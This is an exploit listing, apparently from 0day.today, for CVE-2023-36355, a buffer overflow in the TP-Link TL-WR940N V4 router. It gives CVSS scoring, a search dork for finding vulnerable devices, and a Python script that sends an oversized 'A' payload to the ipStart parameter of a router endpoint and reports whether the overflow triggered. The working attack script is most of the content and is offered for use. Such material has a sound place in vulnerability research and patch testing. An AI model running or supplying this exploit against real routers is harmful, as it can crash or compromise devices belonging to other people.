TP-Link TL-WR940N V4 - Buffer OverFlow Exploit

2023-07-0400:00:00

Amirhossein Bahramizadeh

0day.today

tp-link tl-wr940n v4

buffer overflow

exploit

vulnerable endpoint

windows

linux

cve-2023-36355

crafted payload

router's ip

response status code

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

0.007 Low

EPSS

Percentile

80.7%

JSON

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000  # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
    print('Buffer overflow triggered successfully')
else:
    print('Buffer overflow not triggered')